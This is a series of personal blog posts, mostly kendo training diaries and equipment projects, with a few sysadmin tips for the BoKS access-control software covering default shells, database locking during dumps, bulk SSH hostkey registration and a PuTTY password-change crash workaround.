Having recently returned from Japan I presented two of our trainers with the omiyage I bought them. On day 6 of our trip we'd visited the Hakozaki shrine to the kami Hachiman, protector of warriors and farmers. Hachiman is one of Shinto's most popular deities, covering both war and harvest. At the shrine I bought omamori (charms) for victory in sports and budo, which is what I gave to my teachers as a token of gratitude.

I've also ordered a frame for kendo glasses: these, from e-Bogu.com. As I've mentioned before I cannot wear my own glasses inside my men and it's a pipe dream to think that I will ever be able to wear contacts. I recently spent 45 minutes failing to even touch my eyeball, so putting a contact on there is completely out the window. Anyway. The frame needs to come in from the US, so it'll take a while to get here. Then I still need to get my prescription lenses made for them, which is going to cost a pretty penny. Then, after that, I can -finally- put on a helmet and get hit in the head :D


kilala.nl tags: , ,

View or add comments (curr. 4)

BoKS: setting new users' default shell

2011-10-26 00:00:00

Recently we upgraded our BoKS master and replica servers. Out went the aged Sun V210 with Solaris 8 and BoKS 6.0.3 and in came shiny new hardware+OS+BoKS. Lovely! Everything was purring along! We did start getting complaints that newly created users couldn't log in to all of their servers, which seemed odd. One of our Unix admins spotted that all these users had their shells set to bash, while ksh is the default shell we should be using.

How come the user default shell had changed all of a sudden? We traced the cause back to the BoKS web interface, but couldn't find out where the new shell setting had come from.

So! Back to grepping through the TCL source code of the web interface! A last-ditch attempt: searching for every instance of the word "shell" (excluding the help files of course). In between oodles of lines of code I stumbled upon this nugget:

# Get first shell from /etc/shells if it exists,
proc boks_uadm_get_default_shell {} {
    if { [catch {set fp [open /etc/shells r]}] == 0 } {

So there you have it! The BoKS v6.5 web interface simply grabs the first line of /etc/shells (if the file exists) and uses that as the default value in the "shell" field when creating new user accounts. After changing the first line back to /bin/ksh things were back to normal.
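
In other words, a one-liner tells you what new users will get. Purely as an illustration, with made-up file contents, the before and after of our fix looks like:

$ head -1 /etc/shells
/bin/bash

...move /bin/ksh to the top of the file, and...

$ head -1 /etc/shells
/bin/ksh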

An RFC has been submitted to make the users' default shell a configurable option.


kilala.nl tags: , ,

View or add comments (curr. 0)

Summer's over and kendo practice resumes

2011-09-15 05:53:00

Last Saturday we finally got the new kendo season in Almere off to a start! A week late, but we enjoyed it nonetheless. Turn-up was good, with roughly fifteen students and two teachers present.

Because the training hall is completely new to us it took us a while to get started. New dressing rooms, a different floor, dust and crap left over from construction that we needed to clear from the floor, etc. All in all we got started half an hour late, after most students had busied themselves with cleaning, kata or warming up. I chose to do stretches and footwork practice and around 0930 felt like I was pushing myself. Already! Even half an hour in I was hot and tired, how odd! I'm glad that Martijn and I continued practice over summer, because I don't know what state I'd've been in otherwise. I guess it might've been the heat in the training hall, because after said half hour I felt great. Even the extended footwork practice during warm-up didn't faze me, while it usually wears me out. I even had breath enough for good kiai.

Did the summer practice with Martijn pay off? Yes. Probably not in technique, but it sure made me more comfortable actually hitting other people. When doing waza practice I used to take a while to work up to hitting someone; much less so now. ^_^

In the end sensei indicated that he wasn't very happy with the state of everybody's kendo. It showed that we'd had a holiday and many people were being sloppy and rushed. One specific thing that Hillen pointed out to me is that my fumikomi is off: my shinai is always trailing behind my footwork. That's something I need to work on!

Last night I also had another practice with Martijn. It really shows that summer is over, because right off the bat at 2015 we were already working in the dark. I need to get a better lamp for the yard :(

Because of the dark and because I can't wear my glasses inside the men we didn't get to do too much practice. Martijn did show me an excellent exercise: while motodachi repeatedly strikes men, shidachi will parry each blow and immediately make a do strike. So basically the student practices kaeshi do. It's a fun and useful exercise.


kilala.nl tags: , ,

View or add comments (curr. 0)

Beginning of a new kendo season: false start

2011-09-04 10:13:00

My loaner bogu

Yesterday marked the beginning of the 2011-12 kendo season at Renshinjuku Almere (錬心塾剣道 アルメレ). Everybody was raring to go, excited to try out our new training room at the new Nautilus College building. But sadly it wasn't to be. Sensei had all the keys and everything had been arranged, but he had been given the wrong PIN for the alarm system. So we had to cancel our first day of the new season. 

On a nice note: from now on I am allowed to train in bogu! I recently had an email discussion with sensei Ton about the fact that Martijn and I had been doing some jigeiko, but that we would put it off for now for fear of bodily harm. Sensei then replied that I could borrow one of the dojo's loaner bogu to get me started, before ordering my own set. So yesterday, in the parking lot, we picked out a set of armor, which I then tried on at home. 

The tare (waist armor) and do (belly and chest) are fine, though the himo (ties) of the tare are -very- worn out. The kote look quite akin to boxing gloves, but are comfortable. Sadly, the men (helmet) is not a perfect match: it's too tall (which can be fixed with padding) and also so narrow that I cannot fit my glasses at all. Martijn's men allowed me to keep my glasses on, so I guess it's a matter of finding the right helmet. 

Having a short go at jigeiko again I now fully understand what people mean when they say that one would need to relearn all the basics once you start wearing bogu. Your posture needs to change completely and I found the experience of wearing armor so disorienting that I even forgot all basic footwork and strikes. Viewing through the mengane without my glasses is also very confusing: I keep using one eye only for focusing :(

I will put on the armor a few times this week, to grow more accustomed to it all. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Doesn't that hit too close to home?

2011-08-14 10:26:00

work environment = lab environment

From Dilbert, of course.


kilala.nl tags: , ,

View or add comments (curr. 5)

Photography as a study-aid

2011-08-04 05:44:00

Thomas and Martijn in tai atari

Since getting her new EOS 1100D Marli's been trying out various things to learn how to properly use a DSLR camera. The kendo practice that Martijn and I do on a weekly basis is one of her favoured test cases, since it involves fast-moving subjects. The added bonus is that many of her photographs can be used as a study aid by me!

Case in point... Aside from the fact that:

  1. I like this photograph.
  2. The photograph shows how fscking grey my hair is getting.

The photo also shows me something crucial about how badly I perform tai atari: look at my wrists! They're completely wrong! No way in heck am I going to provide proper defense, nor a push back, to Martijn. Similarly, Marli's photography also shows that my do strike is much worse than I thought it was ;_;


kilala.nl tags: , ,

View or add comments (curr. 0)

Understanding more about kendo

2011-08-03 08:36:00

Recently George McCall posted a translation of a 1978 article on the teaching of tsuki, the kendo thrust to the throat. The article is very educational with regard to the pre- and post-war history of kendo and how the sport has developed. It has also triggered an "Aha-Erlebnis" in me with regard to the kendo term datotsu: a scored point. The article includes the following passage:

"In this way, even though we note the success of modern kendo, we must deeply consider and reflect on what its become. One example is the case where we have banned tsuki for use in children of junior high school age and below; to look at it a different way, if you consider the very basis of kendo – hitting a clear DATOTSU (打突) i.e. cutting (打) and thrusting (突) – we have removed the thrusting part (突) and as such its not an exaggeration to say what we are left with is a kendo that incomplete (deformed)."

It had never occurred to me that the word is literally "da-to-tsu"! Hence the "Aha-Erlebnis", because the kanji for the word are indeed "da" and "tsu", the "to" being implied.

Anyway... a good article, in spite of its age! I wonder how much has changed in the past 30+ years with regards to the teaching of tsuki. Currently I'm under the impression that it's been mystified, almost to the level of the jodan no kamae. People think it's scary, it's difficult and it's dangerous. And thus it's still not taught. On the other hand, the article has made me feel better about attempting the occasional tsuki on Martijn. -Especially- when he's in jodan :p

Also, something else from the article just "clicked" with what Loyer-sensei has been trying to teach me regarding small men (bold and underline for emphasis):

"The purpose to have [young students] study tsuki is that the children should be forced to understand the following points about the importance of kihon:

  1. Strike men as if aiming to tsuki, don’t let your kensen go outside your opponents center (correct chudan no kamae);
  2. It helps fix unnatural tenouchi (correct grip);
  3. Tsuki not with your hands, but with your hips (correct body movement);"

*click*


kilala.nl tags: , , ,

View or add comments (curr. 2)

Quick, new insights from tonight's kendo

2011-07-30 23:37:00

Practiced again with Martijn tonight and I learned two things. Or actually, I knew them as a matter-of-course, but their importance was impressed upon me once more.

  1. The center line is what it's all about, both defensively and offensively. Having the line opens up many modes of attack which require much less effort to break open. Losing the line opens you up to plenty of attacks in a heartbeat.
  2. Speed. I need to develop it. Not only do I need to stop waiting things out, spending X amount of seconds thinking and looking, but I also need to make my movements much faster. Halfway through our practice I decided to up the ante a little bit, to get more pushy and to get faster. BAM! Martijn pours on the speed as well and I'm lost. It showed very, very clearly how much he's been holding back so far. 

kilala.nl tags: , ,

View or add comments (curr. 0)

Lessons from last night's kendo

2011-07-20 05:33:00

As I said before: I'm becoming lazy. Instead of chomping at the bit for more kendo practice I was actually trying to find excuses to cancel last night's practice. I'm glad that Marli didn't let me and that Martijn was showing such enthusiasm :) If anything, last night's exhaustion tells me that I still love kendo and that I really do need to keep up my practice (both in running and in kendo). 

So that's one lesson learned, but what else was there?

  1. When my shinai is pushed out of the center line, I push back. When this is done repeatedly, all the opponent has to do is release tension on his shinai and bingo! My sword swerves waaay to the other end and there's an open kote target. 
  2. When opponent goes for my men, I raise my shinai to deflect. However, I raise it too high and too far to the right, so again that's an open kote.
  3. With many attacks, instead of parrying and countering, I simply brace for impact. 

kilala.nl tags: , ,

View or add comments (curr. 0)

Kendo practice, shifting my focus

2011-07-05 07:28:00

An arctic hare

Last night, despite muscle aches* and tiredness, Martijn and I got together for another training session. After stretching and a little suburi I followed Menno's advice and decided to forego any real focus on the small/fast men strike.

First off, Martijn was interested in practicing jodan no kamae, which is a completely different stance than is normally used and taught. Whereas chudan no kamae is both safe and stable, jodan has both drawbacks and positive sides. For example, while extending the kendoka's reach considerably (at least half a pace), the raised shinai leaves both the do and the left kote open for attack.

With Martijn having practiced some men strikes from jodan we then proceeded with something that I could use more of: jigeiko. With Martijn wearing his bogu it was up to me to practice seme and to create an opening for myself. As I already know (and as Martijn remarked yesterday) I'm about as threatening as an arctic rabbit, so this is good practice for me!

Stuff we practiced:

*: I helped lay laminate flooring at Kaijuu's new house last weekend. I love doing that as it's part puzzle, part physical and all manual labour ^_^


kilala.nl tags: , ,

View or add comments (curr. 3)

I don't practice enough

2011-07-01 17:10:00

Kendo practice in the yard

I really should make myself do more kendo practice at home. I don't know why I started slacking, but it's dumb. ಠ_ಠ

So thank $DEITY that Martijn SMSed me, asking if I was up for practice! No excuse to slack off anymore! We took a lot of time trying to get me to understand the movements for fast men, but I still don't get them right. I can do the thrust just fine, but for now I cannot manage to work in the required smack! to make a hit. We did manage to make a few nice potholes in the lawn, practicing fumikomi and hayasuburi ^_^;

Martijn also let me try on his bogu. The tare, kote and do are just fine and wearing them was actually quite comfortable. Putting on the men it was soon clear that, while my glasses do fit under there, the helmet really doesn't fit well that way. This means that I need sports glasses, contacts or laser surgery, just as had been foretold. Meh... :/

Getting struck on the do doesn't hurt at all, unless it misses :p The kote strikes were a bit sharp and the men hits were pretty... interesting, that's the word.


kilala.nl tags: , ,

View or add comments (curr. 6)

Things to take away from today's kendo class

2011-06-25 13:46:00

It's starting to become a theme, but:

Today's class felt GREAT! After our usual warming up (though again without running laps) we did at least an hour of waza keiko, practicing all of our basic techniques. The more advanced students finished off by learning different counter-attacks to deal with a fast men strike. In the meantime, Hugo and I kept on repeating the basic drills: big men, fast men, kote-men, big men. To end it all off, the students in bogu then did a rotating sogo renshu, where each student was in turn attacked by the eight others to practice their new counter-attacks. 

The final twenty minutes of class were spent on jigeiko, where all students were free to practice with one another and with the teachers. During the waza keiko and during the jigeiko I spent about ten minutes with sensei Ton practicing the fast men strike, something that I struggle horribly with. The proper form is to:

  1. Step in.
  2. Step in and thrust straight for the face.
  3. Sweep up the kensen and strike. 

The problem being that I fail to do a straight thrust for the face. I kept on "shoveling", meaning that I lower my left hand (tipping the shinai upwards) followed by moving my arms upwards, to slap the shinai down again. To get rid of this annoyance Ton had me do something unusual: practice tsuki thrusting (short video) on him.

That got the message across, though Ton then pointed out a new flaw in my form: when doing a thrust I habitually do a very small pull backwards on my sword, which is a total and dead giveaway of what I'm going to do. The suggested training method Ton gave me: stand in front of a mirror, hold your hands at normal kamae height, then thrust at the throat of your mirror image. Man! I'd really love to have that training dummy by now :D

During the jigeiko part of class mr. Waarheid (another visiting student) suggested that we do some uchikomi geiko, where he'd make openings for me to strike. When practicing fast kote-men-do he pointed out that I was screwing up maai, by stepping in waaaay too much for each consecutive strike. 

What a great class! I feel awesome and I've learned so much today :)

EDIT:

Ah yes! More things... During jigeiko I had to bow out for a few minutes to get my heart rate to drop. Five rounds of kirikaeshi, followed by five double rounds of men, men, kote-men, men got my heart pounding and sadly I couldn't bring myself to push through. So I sat out one round of bouts and then jumped in again. And again, Ton reminded me that my kamae is too tense. I also twist my wrists to the inside a little too much, which limits my maneuverability. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Kendo project: shinai carrier (2)

2011-06-25 13:24:00

A bag to carry shinai

For the past three nights, Martijn and myself have been working on making our shinai carriers. On Wednesday we went to get the materials for the sturdy and waterproof interior. We even got the basic tube finished by then.

Thursday and Friday night were spent on making a cloth exterior, which includes a side pocket for bits and pieces (mostly tsuba and tsubadome). By Thursday at midnight my bag was covered in cloth and only required a bottom piece to finish it off. Yesterday was spent on dressing Martijn's tube and painting kanji on his bag. 

The designs:

Both bags still "require" a covering for the top, but for now I'm happy with the result: two sharp looking and perfectly safe carrying bags for three shinai and a bokken each. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Kendo project: shinai carrier

2011-06-22 22:40:00

PVC tube shinai carrier

Inspired by Kristin's lovely naginata carrier project, Martijn and I have started our own spin-off: the rock solid and water tight shinai case (announced earlier this week).

This evening we trotted to the local DIY store to get four meters of PVC tubing (the most economical choice) and all the required trimmings. The full shopping list came in at:

All in all the bill for that comes in somewhere around 15 euros per shinai case and we still have tubing left for a third one. Not bad for starters. For Martijn's case he added a few euros more for the strap and trimmings, while I used the strap and materials from a denim bag of mine that was worn out. 

We could've actually kept the costs down a little more by going with either 100mm or 75mm diameter tubing. Our 110mm cases are large enough to fit no less than three shinai and a bokken! o_O Most kendoka carry either 1+1 or 2+1 so our cases are "spacious" to say the least.

For now the cases might not look like much (they really are just PVC tubes with straps), but the next phase of the project will be to find a nice way to dress the cases up a little. I'll probably be going with some strong denim to match the strap, while Martijn was looking for something a bit more out of the ordinary. All in all, there's a nice sewing project coming up! 


kilala.nl tags: , ,

View or add comments (curr. 1)

Time to break out the tools and get creative!

2011-06-19 10:07:00

building a kendo dummy

Who'd have thought that practicing a sport would also lead to creative tendencies? You may remember that I kind of, sort of damaged our fence a few months ago, looking for a target to practice men strikes. Since then I haven't found any real alternatives, leading both Martijn and me to search for a frame or a dummy of sorts. A quick search turned up simple practice dummies such as this one and this one. Both look fine and shouldn't be too hard to build. 

However, instead I would love to build the dummy pictured on the left. It's based on free instructions by Best Kendo, who provide full plans and designs to build this kendo practice dummy. The good part about this dummy: all three valid striking targets (men, kote and do) are available and there's even an option for the dummy to hold a shinai for added realism. It may be a complicated design to put together, but it looks great!

One thing I would like to do differently from the Best Kendo design, is to construct the dummy in such a way that it can be dismantled for storage or transport. This would require a minimal change to the design of the arm (just use a different screw/bolt combo), though the foot would be quite different. Instead of gluing and screwing the body to the base I would use another axle screw/bolt. Because this might compromise the strength of the structure, it might be wise to add a diagonal leg which gets connected with a similar peg. 

Another project that I'm looking forward to is making a weather proof case for my shinai and bokken. My ideas for the design are inspired by a homemade naginata case project by Kristin. For my shinai case I'll be getting a PVC tube which, like Kristin, I will be covering in a nice looking fabric. Unlike Kristin I won't be attaching the straps to the fabric, but instead I'll use rain pipe fasteners which are usually used to connect a PVC tube to the side of a house. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Kendo class? More like kendo clinic!

2011-06-18 13:04:00

Like last week, today's class was tiny! Aside from Ton and Kris, there were four of us out of bogu, two young kids in bogu and maybe two other adults in armor. So that made for a very skewed class with three 2nd dan teachers (actually, I don't really know Raoul's grade, he could very well be higher!), one 1st dan student and the rest of us just lowly mu-dansha. Basically there was one teacher per two students. That doesn't make for a class anymore; it's a friggin' clinic! Seriously, had this been golf we'd have paid through the nose for a class like this! In all I had at least fifteen minutes of personal attention from Kris! 

Anyway. Just like last week:

It's nice to see some improvements though! After my very first lesson in January I wrote: "I can only dream of ever becoming as fast as some of these folks! One fellow I practiced with would be able to get in five to seven blows for every one of mine. The light footedness! Amazing!". What I wrote then was after learning haya suburi (go watch the linked video!). While I'm nowhere near the speed and souplesse of our teachers yet, I am very happy that I can keep up with my fellow students. ^_^


kilala.nl tags: , ,

View or add comments (curr. 1)

Analyzing my men strike

2011-06-14 22:44:00

As I wrote earlier, last weekend I learned that many aspects of my kendo suck. As my teachers suggested I set up a camera to record about fifteen minutes' worth of shomen strikes, both with and without fumikomi.

With my layman's eyes I notice the following:

There's plenty more to learn, so I'll be rewatching that clip a few times more. Below is just a small excerpt, so folks can make fun of me :P

Shomen2011.mov


kilala.nl tags: , ,

View or add comments (curr. 6)

Well, that was hard work!

2011-06-11 12:54:00

Again, like a few weeks ago, we had a rather small group at Renshinjuku in Almere. While a low attendance does affect the atmosphere negatively (nobody's on edge) it also has an upside: everyone can get the undivided attention of sensei and the sempai. And today I learnt that many of the things I've been doing really aren't that good, but so far they've gone unaddressed.

Hillen noticed two things, one of which I've stupidly forgotten :( 

Kris really was very dedicated and noticed a boatload of things:

I didn't work with Ton very much today, but during uchi-geiko it was obvious that:

There was more, but sadly it doesn't come to mind just yet. I'll try to remember later...

Both Kris and Ton suggested getting a third-person's view of my suburi. Either by using a mirror or a camera. Marli had also suggested the same a few weeks ago. I'd better set up the mini tripod I have, so I can film myself. Worked when I was learning golf swings, so it'll work here as well. 

EDIT:
I spoke with Martijn, my study-buddy you might say, on the way home and I've decided that I need to up my running schedule to build more endurance. I don't know if it's the heat in the dojo today, if I'm just in a rut or whether I just suck, but today's class wore me out. I haven't sweated this much before! My keiko-gi and undershirt were drenched! I was already panting quite heavily after the laps of warming-up footwork and I couldn't hold my post-striking position that long either (while the teachers were evaluating us). 

So. Not necessarily more, but longer running! And I really need to stick to my at-home suburi schedule!


kilala.nl tags: , ,

View or add comments (curr. 0)

Locking the BoKS database for fun and profit

2011-06-07 00:01:00

If your BoKS master server ever inexplicably grinds to a halt, blocking all suexec and remote logins, just do a ps -ef to check if there's anybody running a dumpbase. Then pray that you can contact this person, or that there's still someone with a root shell on the server...

A running dumpbase process keeps a read/write lock on the BoKS database until it has dumped all the requested content. If you have a sizeable database a full dump can take half a minute or more. That's not awful and it won't affect your daily operations too much, but it should still be kept to a minimum.

But what if? What if someone decides to run dumpbase and then pipe it through something like more?

The standard buffer size for a pipe is roughly 64kB (some Unices might differ). This means that dumpbase will not finish running until you've either ^C-ed the command, or until you've more-ed through all of the pages. Thus the easiest way to completely lock your master server is to more a dumpbase and then go get yourself a cup of coffee, because not even root will be able to log in on the console while the dumpbase is active.
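
If you absolutely must page through a dump, write it to a file first so the lock is released the moment dumpbase finishes. A minimal sketch; the suexec prefix and temporary file name are just how I'd do it, adjust to taste:

# Dump the database to a temporary file: the read/write lock is only held while
# dumpbase itself runs, not while you leisurely read through the output.
suexec dumpbase > /tmp/boks-dump.$$
less /tmp/boks-dump.$$
rm /tmp/boks-dump.$$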


kilala.nl tags: , ,

View or add comments (curr. 0)

BoKS: registering SSH hostkeys in one blow

2011-06-07 00:00:00

Last weekend we upgraded our last BoKS v6.0.3 server to 6.5, which presented us with a few interesting challenges. More about those later. But first! SSH host keys!

As of BoKS v6.5 the SSH daemon/client software will automatically verify that the SSH hostkey of the server you're connecting to matches the one listed in the BoKS database. If you're unprepared for this new feature, you could be caught unawares by a situation where SSH warns you about a man-in-the-middle attack, despite your personal ~/.ssh/known_hosts file being empty.

To prevent this from happening we ran a simple two-liner right after performing the upgrade. The script below (if you can even call it that) will tell all the BoKS client systems in your domain to set their SSH hostkey in the database to its current key.

# Loop over all Unix/Linux client hosts registered in the BoKS database.
for HOST in $(sx hostadm -Sl | grep UNIXBOKS | awk '{print $1}')
do
    # Tell each client to (re-)register its current RSA hostkey in the database.
    cadm -s "ssh_keyreg -w -f /etc/opt/boksm/ssh/ssh_host_rsa_key.pub" -h "$HOST"
    # Short pause between hosts, so we don't flood the master with queued jobs.
    sleep 3
done

Of course you shouldn't run this script willy-nilly, but only at times when you know the current hostkeys to be correct :)

Once the FOR-loop has finished you will notice that the fields SSHHOSTKEY and SSHHOSTKEYTYPE in table 6 of the BoKS database will now contain values for each registered client.
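
If you want a quick sanity check afterwards, dump the database to a file (never straight into a pager, see the note about dumpbase locking elsewhere on this site) and count the registered keys. This assumes the field name shows up literally in the dump output:

# Crude check: dump everything to a file, then count occurrences of the hostkey field.
suexec dumpbase > /tmp/boks-dump.$$
grep -c SSHHOSTKEY /tmp/boks-dump.$$
rm /tmp/boks-dump.$$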


kilala.nl tags: , ,

View or add comments (curr. 0)

A few lessons from private kendo practice

2011-06-02 21:47:00

Tonight's practice with Martijn wasn't as serious as it could've been. We were a slight bit hurried, I'm nursing a cold, he'd sprained his back and we were giggly. Oh well, as long as we keep that out of the dojo it's fine ~_^

A few things I'm taking away from tonight:

Speaking of my personal training schedule, right now I try to do the following once or twice a week (aside from my sessions with Martijn and the Saturday morning in the dojo). This list actually matches the warming up suburi we do at the dojo, but ups the amounts quite a lot. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Planning our trip to Japan

2011-06-01 12:45:00

The syudoukan dojo

In a few months the Sluyter family will travel to Japan for three weeks of holiday. Together with our good friends Kaijuu and Michel we'll stick around the island of Kyushu for a week and hang around the Kansai area (Osaka) for another two weeks. It'll be nice to go back to Japan, especially Kansai.

In preparation for our trip I've already started expanding the Google Map for Shiranai Travel with all manner of interesting sights. Most of these will be centered around Kyushu, Hiroshima, Kobe, Osaka and Kyoto because we're temporarily avoiding going further east what with the whole Fukushima deal. I mean, we don't expect anything to be wrong with Tokyo and so forth, but we can always leave those areas for another visit.

One thing I will put on my "must do" list involves kendo (sorry honey!). I've recently learned that there are two excellent dojo right in the vicinity of our apartment building in Tanimachi Yon-chome. What's more, the Syudoukan dojo (pictured left) is actually on the Osaka-jo (castle) grounds! Both dojo welcome foreign visitors, so how can I pass up an opportunity like that?! Judging by the map I was actually pretty close to the Syudoukan dojo when we visited the gardens on New Year's night. The other dojo, Yoseikai, is a short trip away by subway and is home to one of the editors of the Kenshi247 website.


kilala.nl tags: , ,

View or add comments (curr. 3)

Understanding the meaning of kendo kata

2011-06-01 07:05:00

A few weeks ago I'd found a few interesting articles about the meaning of kendo kata, mostly focusing on kata #1 through #3. The other day I was practicing kata with a visiting kendoka, Raoul from Amstelveen, and he was teaching me kata #3. While going through the motions I failed to grasp the riai (theory or reason) behind a certain movement and neither of us could figure it out on the spot.

The question I had was: "What is it that motivates uchidachi (teacher/attacker) to drop his sword after already successfully parrying two of shidachi's (student/defender) thrusts?"

Now, thanks to the earlier reading I already knew that in kata 3, shidachi has no intention whatsoever of killing or hurting uchidachi, meaning that the two thrusts (or actually one thrust and one push) weren't parried to begin with. But again, why would uchidachi give up and simply lower his sword?

Sometime this week I realized what could be the answer: the seme (willpower) of shidachi completely suppresses uchidachi's will to attack and uchidachi has realized that he's lost. Uchidachi is being backed against the wall, so to speak. After some more reading I've found materials that seem to support my theory, so I wasn't too far off :)

This is one of the reasons why I love kendo: figuring out puzzles is part of the kenshi's learning process.


kilala.nl tags: , ,

View or add comments (curr. 2)

Equipment maintenance, for safety and enjoyment

2011-05-26 07:07:00

A shinai in pieces

When it comes to my kendo equipment, I quickly learnt how to properly care for my uniform: how to fold both the hakama and the gi to retain the pleats and shape. So far though, I've been avoiding one crucial part of equipment maintenance: taking apart and inspecting my shinai. But I finally did it last night ^_^

Menno, as a vetted sports climber, will confirm the necessity of regularly inspecting your equipment for defects. If his materials are broken it might cost him his life, by plummeting to the ground. Similarly, if my shinai is messed up, it might take out someone's eye. I mean, it -is- a stick I beat other people around the head with :/

Armed with an excellent free kendo equipment manual (courtesy of the Fukuda Budogu company) I dismantled the shinai into its components and found everything in order. No splits, no splinters and no defects in the tsuru (the yellow string) or the leather parts. Putting it back together I rotated the bamboo slats' order, making the original bottom slat the left one. The reasoning behind this is that it will ensure even wear and tear on the whole shinai. Getting the tsukagawa (the leather grip) off the handle proved a challenge since it's so tight. However, as suggested by the guidebook, latex gloves quickly solved that problem!

The whole process took me a little over an hour. Lessons learnt? That I'll need some practice in retying the tsuru, because right now it's not as tight as it could be.

I recently saw a great documentary on the production of shinai (part 1 and part 2 on YouTube). I don't know if it applies to my model, but in general the creation of one takes quite a few hours of manual labor. It was great seeing the artisan go through the steps of making a sword, starting with newly dried bamboo branches.



kilala.nl tags: , ,

View or add comments (curr. 1)

Kendo stinks, just so you know

2011-05-23 16:49:00

Screenshot from Bamboo Blade


There aren't many anime that focus on kendo, the most famous one being a series from the early eighties: Musashi no ken (lit. "the sword of Musashi"). Another, much more recent one, from the fall of 2007 is Bamboo Blade. The screenshot above is from the show, ridiculing one of the commonly known aspects of kendo: kendoka and their equipment stink, especially during summer (^_^);.

Bamboo Blade really isn't that good: I'd qualify the art as meh, the story as generic (though it's growing on me after a few episodes) and the animation as crude. But still, it's about kendo, it does a fair job of portraying shiai and it conveys the enthusiasm kendoka have for their sport pretty well!


kilala.nl tags: , , ,

View or add comments (curr. 0)

Small group today at Renshinjuku

2011-05-21 17:55:00

Like a few weeks ago, today was a small class in the dojo. Only eight guys in bogu and three newbies in keikogi.

Before warming up with suburi and stretching (no running at all this week, that felt odd!) the whole group focused on studying kata. I'm very grateful for the help of Raoul, a visiting member of our Amstelveen dojo, who provided me with some good insights on kata 1 through 3. After that sensei Ton took us rookies aside for some practice and uchi geiko, while the rest of the group spent the remaining hour sparring. 

My fast men and kote are still crappy, as I learnt last week. I did finally understand the mechanics behind the fast men, after seeing a few confusing explanations in class. The idea behind the fast men strike is that the shinai moves in a straight line towards the opponent's face, only to jump up for a strike at the last instant. I kept on thinking that this movement was achieved through the wrists, but instead it happens almost automatically by thrusting forward, combined with raising and straightening the right arm. And -then- the wrists come in :)

EDIT:

Now the only thing I need to figure out is why the heck I keep getting these splitting headaches after training. I get back home around 1200 and you can bet dollars to donuts that by 1300 I'll have a headache that lasts until I go to sleep at night. Menno suggested that it might be a hydration problem, but it even occurs now that I'm downing 1.5 to 2 liters of water in the morning. Personally I'm thinking it might have something to do with the muscles in my neck and how I use them during kendo.


kilala.nl tags: , ,

View or add comments (curr. 3)

Finally, kendo again!

2011-05-14 17:39:00

After missing four weeks of training in a row (family stuff, spring cleaning, Queen's Day and Anime 2011) I finally got back to the dojo today! Training with Martijn in our yard has been very helpful, but of course there's no substitute for the watchful eye of sensei and training with the other 15 folks in our class. 

Despite the fact that the past two weeks I've held back on training, the warmup routines came pretty easily! The usual stretching and suburi, two laps of suri-ashi and three laps of fumikomi-ashi. Usually I'm pooped after the laps of suri-ashi, but not this time. Nice. Either way, starting from next week I'll run to/from the office again on a daily basis and I'll also train at home at least once a week. Back to my old schedule!

Lessons from today:


kilala.nl tags: , ,

View or add comments (curr. 0)

Putty crash upon password change

2011-05-11 00:00:00


Recently we have been running into an interesting problem between BoKS 6.5.3 (FoxT Server Control) and Putty.

Situation: End user's password has expired and must be changed upon login.

Symptom: On password change, Putty crashes with the error "Incoming Packet was garbled on decryption. Protocol error packet to long".

Cause: Unknown yet.

Temp solution: Set the customer's last password change date to very recently (e.g. modbks -l $USER -L 1), then have the customer log in and change the password manually (e.g. passwd).
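
Spelled out as a tiny sketch, with a made-up username and the flags copied verbatim from the workaround above:

# Mark jdoe's last password change as very recent, so the forced change at login
# no longer triggers; then have jdoe log in and run "passwd" manually.
modbks -l jdoe -L 1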

UPDATE:

Earlier we reported a bug that would make Putty crash when trying to change your password upon login. The rather cryptic message provided by Putty was: "Incoming Packet was garbled on decryption. Protocol error packet to long".  Here's an update on that matter.

A number of FoxT customers logged calls about this problem, among others 110216-012399. After investigating, FoxT's reply in this matter is:

BoKS Master: If you already have TFS090625-101616-1 installed on the Master but not TFS081202-134416-3 (i.e. rev 3) you may want to uninstall TFS090625-101616-1 temporarily and then install TFS081202-134416-3 and TFS090625-101616-1 (in that order).

BoKS Replica: Hotfix 090625-101616 does indeed contain the corrections from 081202-134416 (rev 3). Thus hotfix 090625-101616 is sufficient on the Replicas in this case.



kilala.nl tags: , ,

View or add comments (curr. 0)

BoKS 6.6 ready for release

2011-04-21 00:00:00

Awesome! Just before the Easter weekend a joyous email was sent around the FoxT offices: BoKS version 6.6.1 is now officially ready for release. Oh happy day!

New features in v.6.6.1 are:

Aside from new features, BoKS 6.6.1 also includes no less than 46 bug fixes and modifications which were requested by various customers. Oh happy day indeed!


kilala.nl tags: , ,

View or add comments (curr. 0)

TIL: soft wood is not a valid target

2011-04-19 21:14:00

Oops! Sorry honey! I kind of... broke part of our fence. ^_^;

Tonight I was practicing men strikes. First as suburi, then using the top plank of our garden fence as a target. I'd done this before with little trouble. But I guess the men strikes were too much for the soft wood, because the plank gave way after a few hits. Oops... I'd better break out the hammer and nails tomorrow. =_=

On the upside of things: my raising motion with the shinai is definitely speeding up! And it seems I've got one half of kata #1 down :)

EDIT:

While I'm working on learning the physical movements of the kata I am also trying to come to grasp with the meaning behind it all. I mean, there's supposed to be a good reason for kendoka to have to learn all the kata, so I'd better find out what it is! On the one hand there's understanding the physical aspect of kendo, but on the other there's also the psychological and mental aspects. Researching the "riai" (theory / reason for movements) provides a whole new level of learning, for which one usually doesn't have time in the dojo. 

To quote Geoff Salmon, who is paraphrasing a research paper on kendo:

"In [kata 1], both the teacher and the student attack each other from the 'overhead' posture implying a clash of justice against justice. The first kata is meant to teach that one defeats the other with the difference of relative skill cultivation that corresponds to the laws of nature”. [...] The first lesson in kendo means training for the self acquirement of the physical movement and mental attitude, as well as the cultivation for the self-manifestation of justice. In addition to the self-manifestation, the first kata teaches the importance of repentance for the killing. In real combat, the loser dies and the winner who survives must have repentance. This mental attitude in part represents the assertion of zanshin.

The paper in question, "A breakthrough in the dilemma of war or peace – The teachings of kendo" by Kensei Hiwaki, can be found as part of this British Kendo Assoc. newsletter from 2000. It's not a very long read. Speaking of Geoff's blog, I'm digging a lot of his articles! I doubt there are many 7th dan kendoka keeping an active weblog in English. Another great read was his modernized translation of "The aim of kendo" by Matsumoto Toshio, hanshi kyudan.


kilala.nl tags: , ,

View or add comments (curr. 4)

One-on-one training: learning points

2011-04-13 22:20:00

